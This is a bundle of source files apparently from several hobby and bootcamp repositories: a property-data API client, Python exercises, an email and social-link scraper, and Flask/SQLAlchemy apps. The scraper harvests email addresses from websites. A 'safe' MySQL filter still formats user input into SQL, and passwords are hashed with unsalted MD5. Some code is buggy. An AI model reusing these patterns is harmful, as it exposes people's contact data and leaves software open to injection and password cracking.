output_list = [li for li in difflib.ndiff(line_1, line_2) if li[0] != ' ']
if len(output_list) == 2:
print(line_1, line_2, output_list)
return None
def app():
"""
runs day application
"""
dayinput = readdayinput()
half_one = first_half(dayinput)
print(half_one)
half_two = second_half(dayinput)
print(half_two)
if __name__ == "__main__":
"""
MAIN APP
"""
app()
``` |
{
"source": "johncoleman83/attom_python_client",
"score": 3
} |
#### File: attom_python_client/api/api.py
```python
import copy
import requests
from api import secrets
from api import defaults
URL = 'https://search.onboard-apis.com/propertyapi/v1.0.0'
ATTOM_URL = 'https://api.gateway.attomdata.com/propertyapi/v1.0.0'
HEADERS_DEFAULT = {
'Accept': 'application/json',
}
headers = copy.deepcopy(HEADERS_DEFAULT)
headers['apikey'] = secrets.API_KEY
def ping():
"""
ping api example property/detail by id
"""
path = "property/detail"
params = "id={}".format(defaults.ID)
headers['apikey'] = defaults.API_KEY
url = "{}/{}?{}".format(URL, path, params)
r = requests.get(url, headers=headers)
return r.json()
```
#### File: attom_python_client/api/attomized_avm.py
```python
import requests
from urllib.parse import quote, urlencode
from api import api
PATH = "attomavm/detail"
def get_avm_by_address(number_street, city_state):
"""
API request to get attomavm/detail
"""
params = urlencode(
{
"address1": number_street,
"address2": city_state,
}
)
url = "{}/{}?{}".format(api.ATTOM_URL, PATH, params)
r = requests.get(url, headers=api.headers)
return r.json()
def get_building_from(p, all_beds, all_baths, all_building_sizes):
b = {
'size': p.get('building', {}).get('size', {}).get('livingsize', None),
'baths': p.get('building', {}).get('rooms', {}).get('bathstotal', None),
'beds': p.get('building', {}).get('rooms', {}).get('beds', None),
'bsmt': p.get('building', {}).get('interior', {}).get('bsmtsize', None),
}
if b.get('beds'):
all_beds.append(b.get('beds'))
if b.get('baths'):
all_baths.append(b.get('baths'))
if b.get('size'):
all_building_sizes.append(b.get('size'))
return b
def get_sale_from(p, all_sale_values):
sale = {
'saleamt': p.get('sale', {}).get('amount', {}).get('saleamt', None),
'saledate': p.get('sale', {}).get('amount', {}).get('salerecdate', None),
}
if sale.get('saleamt') == 0:
sale['saleamt'] = None
if sale.get('saleamt'):
all_sale_values.append(sale.get('saleamt'))
return sale
def get_address_from(p):
return p.get('address', {}).get('line1', "NULL")
def get_lot_from(p):
return p.get('lot', {}).get('lotsize2', "NULL")
def get_market_value_from(p):
return p.get('assessment', {}).get('market', {}).get('mktttlvalue', None)
def get_avm_from(p):
return p.get('avm', {}).get('amount', {}).get('value', None)
```
#### File: attom_python_client/file_io/io.py
```python
import datetime
import random
# FILES
FILE_HASH = str(random.random()).split('.')[1]
AVM_RESULTS = "./file_storage/avm_results_{}.py".format(FILE_HASH)
def init_file():
append_to_file_storage("#!/usr/bin/env python3\n\navm_results = [\n")
def terminate_file():
append_to_file_storage("]\n")
def append_to_file_storage(avm_results):
"""
appends the findings to file in case of crash
"""
with open(AVM_RESULTS, "a", encoding="utf-8") as open_file:
open_file.write(avm_results)
``` |
{
"source": "johncoleman83/bootcampschool-higher_level_programming",
"score": 4
} |
#### File: bootcampschool-higher_level_programming/0x01-python-if_else_loops_functions/12-fizzbuzz.py
```python
def fizzbuzz():
s = ["{:d}", "Fizz", "Buzz", "FizzBuzz"]
for i in range(1, 101):
print(s[(i % 3 == 0) + 2 * (i % 5 == 0)].format(i), end=' ')
```
#### File: 0x01-python-if_else_loops_functions/dev/9-print_last_digit.py
```python
def print_last_digit(number):
n = abs(number) % 10
print(n, end='')
return n
```
#### File: bootcampschool-higher_level_programming/0x03-python-data_structures/1-element_at.py
```python
def element_at(my_list, idx):
if idx >= 0 and idx < len(my_list):
return my_list[idx]
else:
return None
```
#### File: 0x03-python-data_structures/dev/0-print_list_integer.py
```python
def print_list_integer(my_list=[]):
for i in my_list:
print("{:d}".format(i))
```
#### File: 0x03-python-data_structures/dev/4-new_in_list.py
```python
def new_in_list(my_list, idx, element):
new_list = my_list[:]
if idx >= 0 and idx < len(my_list):
new_list[idx] = element
return new_list
```
#### File: bootcampschool-higher_level_programming/0x05-python-exceptions/5-raise_exception.py
```python
def raise_exception():
"an" / "error"
```
#### File: bootcampschool-higher_level_programming/0x0B-python-input_output/0-read_file.py
```python
def read_file(filename=""):
"""reads text file"""
with open(filename, mode='r', encoding='utf-8') as a_file:
print(a_file.read(), end='')
a_file.close()
```
#### File: bootcampschool-higher_level_programming/0x0B-python-input_output/11-student.py
```python
class Student():
"""Student class with name and age"""
def __init__(self, first_name, last_name, age):
"""initializes new instance of Student"""
self.first_name = first_name
self.last_name = last_name
self.age = age
def to_json(self):
"""returns dict attributes of Student"""
try:
obj_dict = self.__dict__
return obj_dict
except:
return {}
```
#### File: bootcampschool-higher_level_programming/0x0B-python-input_output/6-from_json_string.py
```python
import json
def from_json_string(my_str):
"""loads (decodes/ converts) string to JSON"""
return (json.loads(my_str))
```
#### File: 0x0B-python-input_output/dev/9-add_item.py
```python
from sys import argv
load_from_json_file = __import__('8-load_from_json_file').load_from_json_file
save_to_json_file = __import__('7-save_to_json_file').save_to_json_file
def app():
"""adds input args to file"""
try:
a_list = load_from_json_file('./add_item.json')
except:
a_list = []
for i in range(1, len(argv)):
a_list.append(argv[i])
save_to_json_file(a_list, './add_item.json')
if __name__ == '__main__':
app()
```
#### File: bootcampschool-higher_level_programming/0x0F-python-object_relational_mapping/3-my_safe_filter_states.py
```python
import MySQLdb
import sys
def init_db():
"""initializes a db with MySQLdb"""
db = MySQLdb.connect(host='localhost',
port=3306,
user=sys.argv[1],
passwd=sys.argv[2],
db=sys.argv[3])
return db
def parse_input(s):
"""parses input removing single quotes and semicolons"""
s = ''.join([i for i in s if i != "'" and i != ';'])
return s
def print_one_state(db):
"""prints one state from input DB with SQL injection safeguard"""
cur = db.cursor()
name = parse_input(sys.argv[4])
cur.execute("SELECT * FROM states "
"WHERE name LIKE BINARY '%{}%' "
"ORDER BY states.id ASC".format(name))
for row in cur.fetchall():
print(row)
cur.close()
db.close()
if __name__ == "__main__":
print_one_state(init_db())
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/102-starwars.py
```python
import requests
import sys
def request_to_star_wars(the_url, payload):
"""makes a request to input URL with q as a parameter"""
res = requests.get(the_url, params=payload).json()
results_dict = {}
name_list = []
count = res.get('count')
if count > 0:
results = res.get('results')
for character in results:
name = character.get('name')
films = character.get('films')
name_list.append(name)
results_dict[name] = films
next_page = res.get('next')
while next_page:
res = requests.get(next_page).json()
results = res.get('results')
for character in results:
name = character.get('name')
films = character.get('films')
name_list.append(name)
results_dict[name] = films
next_page = res.get('next')
for k, v in results_dict.items():
films_list = []
for film in v:
res = requests.get(film).json()
title = res.get('title')
films_list.append(title)
results_dict[k] = films_list
print("Number of results: {}".format(count))
for name in name_list:
print(name)
for title in results_dict[name]:
print('\t{}'.format(title))
if __name__ == "__main__":
"""MAIN APP"""
the_url = "https://swapi.co/api/people/"
payload = {'search': sys.argv[1]}
request_to_star_wars(the_url, payload)
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/103-search_twitter.py
```python
import requests
import sys
import base64
def base_64_encode(key, secret):
"""encodes key and secret in base 64 for the auth credential"""
conversion_string = "{}:{}".format(key, secret).encode('ascii')
auth_credential = base64.b64encode(conversion_string)
auth_credential = auth_credential.decode()
return auth_credential
def get_bearer_token(auth_credential):
"""gets bearer token from twitter OAuth"""
oauth_url = "https://api.twitter.com/oauth2/token"
the_header = {
"Authorization": "Basic {}".format(auth_credential),
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8"
}
the_data = {
"grant_type": "client_credentials"
}
res = requests.post(
oauth_url,
headers=the_header,
data=the_data
)
res = res.json()
if res.get("token_type") == "bearer":
bearer_token = res.get("access_token")
return bearer_token
else:
raise Exception("ERROR, no bearer token returned")
def make_query(query_param, bearer_token):
"""makes a request to twitter search api using the input values:
the query, and the bearer token"""
query_url = 'https://api.twitter.com/1.1/search/tweets.json'
payload = {
'q': query_param
}
the_header = {
'Authorization': 'Bearer {}'.format(bearer_token)
}
res = requests.get(
query_url,
params=payload,
headers=the_header
)
return res.json()
def print_five_tweets(response):
"""prints five tweets from response of twitter API request
FORMAT: [<Tweet ID>] <Tweet text> by <Tweet owner name>"""
statuses = response.get('statuses')
the_range = 5 if len(statuses) > 5 else len(statuses)
for i in range(the_range):
tweet = statuses[i]
tweet_id = tweet.get('id_str')
tweet_text = tweet.get('text')
tweet_user_name = tweet.get('user').get('name')
print("[{}] {} by {}".format(tweet_id, tweet_text, tweet_user_name))
def query_twitter_api_run_app():
"""main application: authenticates credentials from user input,
then searches twitter api from input search terms"""
key = sys.argv[1]
secret = sys.argv[2]
query_param = sys.argv[3]
auth_credential = base_64_encode(key, secret)
bearer_token = get_bearer_token(auth_credential)
response = make_query(query_param, bearer_token)
print_five_tweets(response)
if __name__ == "__main__":
"""MAIN APP"""
query_twitter_api_run_app()
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/10-my_github.py
```python
import requests
from requests.auth import HTTPBasicAuth
import sys
def request_to_github(the_url, un, pw):
"""makes a request to input URL with q as a parameter"""
r = requests.get(the_url, auth=HTTPBasicAuth(un, pw))
the_json = r.json()
print("{}".format(the_json.get("id")))
if __name__ == "__main__":
"""MAIN APP"""
the_url = 'https://api.github.com/user'
request_to_github(the_url, sys.argv[1], sys.argv[2])
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/3-error_code.py
```python
import urllib.request
import sys
def request_error_check(the_url):
"""makes a request to input URL with checks for errors"""
req = urllib.request.Request(the_url)
try:
with urllib.request.urlopen(req) as response:
html = response.read()
print("{}".format(html.decode('utf8')))
except urllib.error.URLError as e:
print("Error code: {}".format(e.code))
if __name__ == "__main__":
"""MAIN APP"""
the_url = sys.argv[1]
request_error_check(the_url)
```
#### File: bootcampschool-higher_level_programming/0x11-python-network_1/5-btcp_header.py
```python
import requests
import sys
def value_request_id(the_url):
"""makes a request to input URL & displays value of X-Request-Id"""
r = requests.get(the_url)
print("{}".format(r.headers.get("X-Request-Id")))
if __name__ == "__main__":
"""MAIN APP"""
the_url = sys.argv[1]
value_request_id(the_url)
``` |
{
"source": "johncoleman83/bootcamp-system_engineering-devops",
"score": 3
} |
#### File: bootcamp-system_engineering-devops/0x16-api/0-gather_data_from_an_API.py
```python
import requests
import sys
def make_request(data, num):
"""
makes employee request and returns json dict response
"""
root = 'https://jsonplaceholder.typicode.com'
url = '{}{}{}'.format(root, data, num)
return requests.get(url).json()
def app(num):
"""
makes request for info about employee todo list, then prints
"""
employee = make_request('/users/', num)
todos = make_request('/todos/?userId=', num)
completed = [t.get('title') for t in todos if t.get('completed')]
total = len(todos)
print('Employee {} is done with tasks({}/{}):'.format(
employee.get('name'), len(completed), total))
for t in completed:
print('\t {}'.format(t))
if __name__ == '__main__':
"""
MAIN App
"""
if len(sys.argv) > 1 and sys.argv[1].isdigit():
app(sys.argv[1])
``` |
{
"source": "johncoleman83/broken_link_checker",
"score": 3
} |
#### File: johncoleman83/broken_link_checker/domain_scraper.py
```python
import getopt, sys, os
import argparse
import random
from modules import *
def parse_and_handle_args(args):
"""
Handles arguments extracted from the user inputs
#Set input var and build url path to input (points to working directory)
"""
print('your selection:\n{}'.format(args))
if not args.url:
if args.input_file == []:
print('Usage:\n$ ./domain_scraper.py --help', file=sys.stderr)
sys.exit(1)
input_file = args.input_file[0]
if 'input_file=' in input_file:
input_file = input_file.split('=')[1]
INPUT_FILE = os.path.join( os.getcwd(), input_file)
else:
INPUT_URL = args.url[0]
INPUT_FILE = None
if args.url:
print('executing: {}'.format(url_input))
url_input.execute(INPUT_URL)
elif args.check:
print('executing: {}'.format(check))
check.execute(INPUT_FILE)
elif args.check_json:
print('executing: {}'.format(check_json))
check_json.execute(INPUT_FILE)
elif args.extract:
print('executing: {}'.format(extract))
extract.execute(INPUT_FILE)
elif args.scrape:
print('executing: {}'.format(scrape))
scrape.execute(INPUT_FILE)
elif args.scrape_n:
print('executing: {}'.format(scrape_n))
scrape_n.execute(INPUT_FILE)
def init_parser():
"""
sets up parser with expected arguments
"""
parser = argparse.ArgumentParser(
prog='domain_scraper',
description='''Scrapes domains from one input URL or
from a file list of domains for broken links,
valid emails, and valid social media links.''',
)
parser.add_argument(
'input_file',
help='Indicate the input file to scrape. Files must be formated like the files in the examples directory.',
type=str,
nargs='*'
)
parser.add_argument(
'--url',
help='Indicate the url to scrape.',
type=str,
nargs='*'
)
parser.add_argument(
'--check',
help='Find broken links from urls in input file.',
const=True, default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--check-json',
help='Find broken links from urls in input json.',
const=True,
default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--extract',
help='Extract name from emails in input file.',
const=True,
default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--scrape',
help='Scrape emails and social media urls from urls in file.',
const=True,
default=False,
type=bool,
nargs='?'
)
parser.add_argument(
'--scrape-n',
help='Scrape emails and social media urls from urls in file while adding new urls to the queue to scrape.',
const=True,
default=False,
type=bool,
nargs='?'
)
return parser
def execute():
"""
MAIN APP
"""
parser = init_parser()
parsed_args = parser.parse_args()
parse_and_handle_args(parsed_args)
if __name__ == "__main__":
if len(sys.argv) <= 2 and '--help' not in sys.argv:
print('Usage:\n$ ./domain_scraper.py --help', file=sys.stderr)
sys.exit(1)
execute()
```
#### File: broken_link_checker/modules/scrape_emails_and_social_media.py
```python
from bs4 import BeautifulSoup
from modules.errors import insert
from modules.file_io import io
from modules.urls import helpers
import queue
import re
import os
import requests
# url helpers
url_is_new = helpers.url_is_new
url_is_image_or_css_link = helpers.url_is_image_or_css_link
do_social_media_checks = helpers.do_social_media_checks
# Storage
all_links = set()
all_social_links = set()
all_emails = set()
links_to_scrape_q = queue.Queue()
# Requests
TIMEOUT = (3, 10)
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
def parse_response_for_emails(r):
"""
looks for emails in response
"""
emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", r.text, re.I)) - all_emails
valid_emails = set()
for e in emails:
if not url_is_image_or_css_link(e):
valid_emails.add(e)
if len(valid_emails) > 0:
all_emails.update(valid_emails)
return valid_emails
def parse_response(r):
"""
parses response text for new links to add to queue
"""
soup = BeautifulSoup(r.text, 'html.parser')
pattern = re.compile('(http.*\:\/\/.*\.+.*\/.*)', re.IGNORECASE)
social_links = set()
for link in soup.find_all('a'):
new_url = link.get('href', None)
if new_url.__class__.__name__ != 'str' or len(new_url) == 0: continue
url_lowered = new_url.lower()
m = re.search(pattern, new_url)
if m is None:
continue
if do_social_media_checks(url_lowered, all_social_links):
social_links.add(new_url)
all_social_links.add(url_lowered)
emails = parse_response_for_emails(r)
return emails, social_links
def scrape_url(url):
"""
makes request to input url and passes the response to be scraped and parsed
if it is not an error code response
"""
try:
r = requests.get(url, allow_redirects=True, timeout=TIMEOUT)
except Exception as e:
print('ERROR with URL: {}'.format(url))
return
status_code = r.status_code
if r and r.headers:
content_type = r.headers.get('Content-Type', 'None')
else:
return
if (status_code >= 300 or content_type.__class__.__name__ != 'str' or 'text/html' not in content_type.lower()):
print('ERROR with URL: {}, status: {}, content-type: {}'.format(url, status_code, content_type))
return
emails, social_links = parse_response(r)
io.temp_write_updates_to_files(url, emails, social_links)
def loop_all_links():
"""
loops through and makes request for all queue'd url's
"""
while links_to_scrape_q.empty() is False:
url = links_to_scrape_q.get()
scrape_url(url)
def execute(INPUT_FILE):
"""
completes all tasks of the application
"""
io.read_file_add_to_queue(INPUT_FILE, all_links, links_to_scrape_q)
io.initial_files([
io.TEMP_EMAIL_OUTPUT_FILE, io.TEMP_SOCIAL_OUTPUT_FILE, io.CHECKED_URLS
])
loop_all_links()
if __name__ == "__main__":
"""
MAIN APP
"""
print('usage: import this')
```
#### File: broken_link_checker/modules/scrape_emails_and_social_media_with_new_links.py
```python
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from modules.errors import insert
from modules.file_io import io
from modules.urls import helpers
import queue
import re
import os
import requests
import datetime
import random
# url helpers
url_is_new = helpers.url_is_new
url_is_image_or_css_link = helpers.url_is_image_or_css_link
url_is_valid = helpers.url_is_valid
do_social_media_checks = helpers.do_social_media_checks
# Storage
all_links = set()
all_social_links = set()
all_emails = set()
links_to_scrape_q = queue.Queue()
# Requests
TIMEOUT = (3, 10)
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
# FILES
FILE_HASH = str(random.random()).split('.')[1]
ALL_OUTPUT_FILE = './file_storage/email_social_links_' + FILE_HASH
NEWLY_FOUND_URLS = './file_storage/newly_found_urls_' + FILE_HASH
# REGEX
EMAIL_PATH_PATTERN = re.compile('about|affiliations|board|departments|directory|governance|leadership|staff|team', re.IGNORECASE|re.DOTALL)
def url_could_contain_email_link(original_domain, parsed_url_object, url):
"""
checks if input url could contian a link with emails
"""
if not original_domain or original_domain not in url: return False
if url_could_be_social_media(url): return False
query = parsed_url_object.query
if query.__class__.__name__ == 'str' and len(query) > 0: return False
path = parsed_url_object.path
if path.__class__.__name__ != 'str' or len(path) < 4: return False
path = path.lower()
m = re.search(EMAIL_PATH_PATTERN, path)
return m is not None
def get_original_domain_from_url(parsed_url_object):
"""
gets the original domain
"""
original_domain = parsed_url_object.netloc
if original_domain.__class__.__name__ != 'str' or len(original_domain) == 0:
return None
return original_domain
def parse_response_for_emails(r):
"""
looks for emails in response
"""
emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", r.text, re.I)) - all_emails
valid_emails = set()
for e in emails:
if not url_is_image_or_css_link(e):
valid_emails.add(e)
if len(valid_emails) > 0:
all_emails.update(valid_emails)
return valid_emails
def parse_response(original_domain, r):
"""
parses response text for new links to add to queue
"""
soup = BeautifulSoup(r.text, 'html.parser')
pattern = re.compile('(http.*\:\/\/.*\.+.*\/.*)', re.IGNORECASE)
social_links = set()
for link in soup.find_all('a'):
new_url = link.get('href', None)
if new_url.__class__.__name__ != 'str' or len(new_url) == 0: continue
url_lowered = new_url.lower()
parsed_url_object = urlparse(url_lowered)
m = re.search(pattern, new_url)
if m is None or not url_is_valid(url_lowered, all_links):
continue
if do_social_media_checks(url_lowered, all_social_links):
social_links.add(new_url)
all_social_links.add(url_lowered)
if url_could_contain_email_link(original_domain, parsed_url_object, url_lowered):
with open(NEWLY_FOUND_URLS, "a", encoding="utf-8") as open_file:
open_file.write("{}\n".format(new_url))
all_links.add(new_url)
links_to_scrape_q.put(new_url)
emails = parse_response_for_emails(r)
return emails, social_links
def scrape_url(url):
"""
makes request to input url and passes the response to be scraped and parsed
if it is not an error code response
"""
try:
r = requests.get(url, allow_redirects=True, timeout=TIMEOUT)
except Exception as e:
print('ERROR with URL: {}'.format(url))
return
status_code = r.status_code
if r and r.headers:
content_type = r.headers.get('Content-Type', 'None')
else:
return
if (status_code >= 300 or content_type.__class__.__name__ != 'str' or 'text/html' not in content_type.lower()):
print('ERROR with URL: {}, status: {}, content-type: {}'.format(url, status_code, content_type))
return
parsed_original_url_object = urlparse(url)
original_domain = get_original_domain_from_url(parsed_original_url_object)
emails, social_links = parse_response(original_domain, r)
io.temp_write_updates_to_files(url, emails, social_links)
def loop_all_links():
"""
loops through and makes request for all queue'd url's
"""
while links_to_scrape_q.empty() is False:
url = links_to_scrape_q.get()
scrape_url(url)
def write_results_to_file():
"""
final writing of results
"""
FIRST_LINE = "TIME: {}\n".format(str(datetime.datetime.now()))
with open(ALL_OUTPUT_FILE, "w", encoding="utf-8") as open_file:
open_file.write(FIRST_LINE)
for url, meta in all_links.items():
if meta.__class__.__name__ == 'dict':
line = "url: {}\n".format(url)
if len(meta.get('emails', 0)) > 0:
line += "emails: {}\n".format(meta.get('emails', 0))
if len(meta.get('social_media', 0)) > 0:
line += "social_media: {}\n".format(meta.get('social_media', 0))
open_file.write(line)
def execute(INPUT_FILE):
"""
completes all tasks of the application
"""
io.read_file_add_to_queue(INPUT_FILE, all_links, links_to_scrape_q)
io.initial_files([
io.TEMP_EMAIL_OUTPUT_FILE, io.TEMP_SOCIAL_OUTPUT_FILE, io.CHECKED_URLS, NEWLY_FOUND_URLS
])
loop_all_links()
# No need anymore for this
# write_results_to_file()
if __name__ == "__main__":
"""
MAIN APP
"""
print('usage: import this')
```
#### File: modules/urls/helpers.py
```python
import re
import requests
INVALID_SOCIAL_MEDIA_PATTERN = re.compile('/home\?status|/intent/|share', re.IGNORECASE|re.DOTALL)
VALID_SOCIAL_MEDIA_PATTERN = re.compile('twitter\.com|linkedin\.com|facebook\.com|github\.com', re.IGNORECASE|re.DOTALL)
TIMEOUT = (3, 10)
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
def make_request_for(url):
"""
scrapes url that is from main domain website
"""
try:
r = requests.get(url, headers=HEADERS, allow_redirects=True, timeout=TIMEOUT)
except Exception as e:
print("ERROR with requests to {}".format(url))
print(e)
return 500
status = r.status_code
if status >= 300:
print('error with URL: {} STATUS: {}'.format(url, status))
if status == 302:
status = r.url
else:
status = None
return status
def url_is_valid_social_media(social_url):
"""
checks if input url could contian a social media link
"""
m = re.search(INVALID_SOCIAL_MEDIA_PATTERN, social_url)
return m is None
def url_could_be_social_media(potential_social_url):
"""
checks if input url could contian a social media link
"""
m = re.search(VALID_SOCIAL_MEDIA_PATTERN, potential_social_url)
return m is not None
def url_is_new(url, object_store):
"""
checks if URL exists in reviewed storage of URLs
"""
if url in object_store: return False
if url.replace('www.', '') in object_store: return False
if url.replace('://', '://www.') in object_store: return False
if url.replace('http://', 'https://') in object_store: return False
if url.replace('https://', 'http://') in object_store: return False
if url + '/' in object_store: return False
if url[:-1] in object_store: return False
return True
def do_social_media_checks(url_lowered, all_social_links):
"""
runs all checks on social media
"""
return (
url_could_be_social_media(url_lowered) and
url_is_valid_social_media(url_lowered) and
url_is_new(url_lowered, all_social_links)
)
def url_is_image_or_css_link(url):
"""
checks if url has image link in it
"""
IMAGE_EXTENSIONS = [
'.png', '.jpg', '@md.x', '.pdf', '.calendar.google.com'
]
for ext in IMAGE_EXTENSIONS:
if ext in url: return True
return False
def url_is_valid(url, all_links):
"""
checks if url is valid
"""
if url[:7] == 'mailto:': return False
if url[-5:] == '.aspx': return False
if url_is_image_or_css_link(url): return False
if not url_is_new(url, all_links): return False
return True
if __name__ == "__main__":
"""
MAIN APP
"""
print('usage: import this')
``` |
{
"source": "johncoleman83/codewars",
"score": 3
} |
#### File: codewars/chess/min_knight_diff.py
```python
SOLUTION = [
[5, 4, 5, 4, 5, 4, 5, 6],
[4, 3, 4, 3, 4, 5, 4, 5],
[3, 4, 3, 4, 3, 4, 5, 4],
[2, 3, 2, 3, 4, 3, 4, 5],
[3, 2, 3, 2, 3, 4, 3, 4],
[2, 1, 4, 3, 2, 3, 4, 5],
[3, 2, 1, 2, 3, 4, 3, 4],
[0, 3, 2, 3, 2, 3, 4, 5]
]
R = {x: i for i, x in enumerate('87654321')}
C = {x: i for i, x in enumerate('abcdefgh')}
def knight(p1, p2):
a = [R[p1[1]], C[p1[0]]]
b = [R[p2[1]], C[p2[0]]]
print(p1, p2, a, b)
if a[0] > b[0]: pass
elif b[0] > a[0]: a, b = b, a
elif a[1] < b[1]: pass
elif b[1] < a[1]: a, b = b, a
else: return 0
if a[1] > b[1]:
a[0], b[0] = b[0], a[0]
a, b = b, a
b[0] += 7 - a[0]
b[1] -= a[1]
print('modified: ', a, b)
return SOLUTION[b[0]][b[1]]
def main_app():
a = [
['a1', 'c1', 2], ['a1', 'f1', 3], ['a1', 'f3', 3], ['a1', 'f4', 4], ['a1', 'f7', 5],
['a1', 'h8', 6], ['c3', 'h4', 4], ['c3', 'a1', 4], ['b7', 'a8', 4], ['e8', 'e1', 5],
['h6', 'b7', 3], ['b7', 'a8', 4], ['g2', 'h1', 4]
]
for x in a:
z = knight(x[0], x[1])
print('expected = {}, actual = {}'.format(x[2], z))
if __name__ == "__main__":
main_app()
``` |
{
"source": "johncoleman83/stamp",
"score": 3
} |
#### File: stamp/dev/add_images_to_db.py
```python
import json
import models
User = models.User
Image = models.Image
storage = models.storage
def load_from_json_file(filename):
"""creates json object from file"""
with open(filename, mode='r', encoding='utf-8') as f_io:
my_dict = json.loads(f_io.read())
f_io.close()
return my_dict
def store_to_db():
""" stores JSON to db """
files = [
'./images_json/lizards.json',
'./images_json/dogs.json',
'./images_json/nature.json',
'./images_json/stained_glass.json',
'./images_json/faces.json',
'./images_json/business.json',
'./images_json/goats.json',
'./images_json/religion.json'
]
num = 1
for filename in files:
json = load_from_json_file(filename)
last_name = filename.split('/')[2].split('.')[0]
u_kwargs = {
'email': <EMAIL>'.format(num),
'password': '<PASSWORD>',
'first_name': 'not_real_{}'.format(num),
'last_name': '{} lover'.format(last_name)
}
new_u = User(**u_kwargs)
new_u.save()
for i in json:
i_kwargs = {
"url": i.get('display_sizes')[0].get('uri'),
"title": i.get('title'),
"family": i.get('asset_family'),
"collection": i.get('collection_name')
}
new_i = Image(**i_kwargs)
new_i.save()
new_i.users.append(new_u)
new_u.images.append(new_i)
new_i.save()
new_u.save()
num += 1
if __name__ == "__main__":
"""
MAIN App
"""
store_to_db()
storage.save()
```
#### File: stamp/models/user.py
```python
from datetime import datetime, timedelta
import hashlib
import jwt
import models
from models import authentication_secret
from models.base_model import BaseModel, Base
import os
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, String, Float, DateTime, ForeignKey
from uuid import uuid4
utcnow = datetime.utcnow
SECRET_KEY = authentication_secret.SECRET_KEY
class UserImage(Base):
"""
UserImages Class
"""
__tablename__ = 'user_images'
metadata = Base.metadata
id = Column(Integer, nullable=False, primary_key=True)
user_id = Column(String(60),
ForeignKey('users.id'),
nullable=False)
image_id = Column(String(60),
ForeignKey('images.id'),
nullable=False)
class User(BaseModel, Base):
"""
User class handles all application users
"""
__tablename__ = 'users'
email = Column(String(128), nullable=False)
password = Column(String(128), nullable=False)
first_name = Column(String(128), nullable=True)
last_name = Column(String(128), nullable=True)
images = relationship('Image', secondary="user_images",
viewonly=False)
def __init__(self, *args, **kwargs):
"""
instantiates user object
"""
if kwargs:
pwd = kwargs.pop('password', None)
if pwd:
User.__set_password(self, pwd)
super().__init__(*args, **kwargs)
def pass_encryption(pwd):
"""
encrypts input to encypted string
"""
secure = hashlib.md5()
secure.update(pwd.encode("utf-8"))
secure_password = secure.hexdigest()
return secure_password
def __set_password(self, pwd):
"""
custom setter: encrypts password to MD5
"""
secure_password = User.pass_encryption(pwd)
setattr(self, "password", secure_password)
def encode_auth_token(self, user_id):
"""
Generates Auth Token
:return: string
"""
try:
payload = {
'exp': utcnow() + timedelta(days=0, seconds=3600),
'iat': utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
SECRET_KEY,
algorithm='HS256'
)
except Exception as e:
print(e)
return e
@staticmethod
def decode_auth_token(auth_token):
"""
Validates the auth token
:param auth_token:
:return: integer|string
"""
try:
payload = jwt.decode(auth_token, SECRET_KEY)
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError as e:
print(e)
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError as e:
print(e)
return 'Invalid token. Please log in again.'
class BlacklistToken(BaseModel, Base):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
token = Column(String(500), unique=True, nullable=False)
blacklisted_on = Column(
DateTime, nullable=False, default=datetime.utcnow()
)
def __init__(self, token):
"""
instantiates with BaseModel attributes
"""
self.token = token
self.blacklisted_on = utcnow()
super().__init__()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
"""
check whether auth token has been blacklisted
"""
all_tokens = models.storage.all('BlacklistToken').values()
for token_obj in all_tokens:
if token_obj.token == str(auth_token):
return True
return False
``` |
{
"source": "johncoleman83/todo-list",
"score": 3
} |
#### File: todo-list/models/user.py
```python
from cryptography.fernet import Fernet
import hashlib
import models
from models.base_model import BaseModel, Base
from models.secrets import CIPHER
from sqlalchemy.orm import relationship
from sqlalchemy import Column, String, ForeignKey
from uuid import uuid4
class User(BaseModel, Base):
"""
User class handles all application users
"""
__tablename__ = 'users'
email = Column(String(128), nullable=False)
fbid = Column(String(128), nullable=False)
name = Column(String(128), nullable=False)
photo = Column(String(512), nullable=False)
tasks = relationship('Task', backref='task', cascade='delete')
def __init__(self, *args, **kwargs):
"""
instantiates user object
"""
REQUIRED = models.REQUIRED
if kwargs:
for req in REQUIRED:
if req not in kwargs:
return None
for key, val in kwargs.items():
kwargs[key] = User.text_encrypt(val)
super().__init__(*args, **kwargs)
def text_encrypt(text):
"""
encrypts input to encypted string
"""
text_bytes = text.encode('utf-8')
encrypted_bytes = CIPHER.encrypt(text_bytes)
encrypted_string = encrypted_bytes.decode('utf-8')
return encrypted_string
def text_decrypt(text):
"""
encrypts input to encypted string
"""
text_bytes = text.encode('utf-8')
decrypted_bytes = CIPHER.decrypt(text_bytes)
decrypted_string = decrypted_bytes.decode('utf-8')
return decrypted_string
```
#### File: todo-list/web_app/app.py
```python
from datetime import datetime
from flask import abort, Flask, jsonify
from flask import render_template, request, url_for
from flask_cors import CORS, cross_origin
import json
from models import storage, Task, User, REQUIRED, APP_PORT, APP_HOST
from models.secrets import API_BEARER_TOKEN
import requests
from uuid import uuid4
# flask setup
